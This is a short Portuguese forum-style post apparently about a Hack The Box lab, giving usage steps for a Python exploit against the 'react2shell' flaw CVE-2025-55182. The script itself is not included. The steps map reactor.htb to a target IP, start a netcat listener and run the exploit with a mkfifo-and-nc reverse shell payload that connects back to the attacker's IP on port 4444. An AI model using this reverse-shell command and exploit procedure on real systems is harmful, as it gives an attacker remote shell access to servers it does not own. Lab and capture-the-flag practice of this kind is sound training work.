
Eu criei um exploit python simples para react2shell CVE-2025-55182
Eu criei um exploit simples em python para o react2shell CVE-2025-55182
USO
Salve o script: Salve o código acima como exploit.py.
Atualize os hosts: Certifique-se de que reactor.htb resolva para o IP alvo no seu arquivo /etc/hosts. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
Inicie o listener: Abra um terminal para capturar a reverse shell. nc -lvnp 4444
Execute o exploit: Execute o script com um payload de reverse shell. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
Substitua <YOUR_IP> pelo seu endereço IP tun0.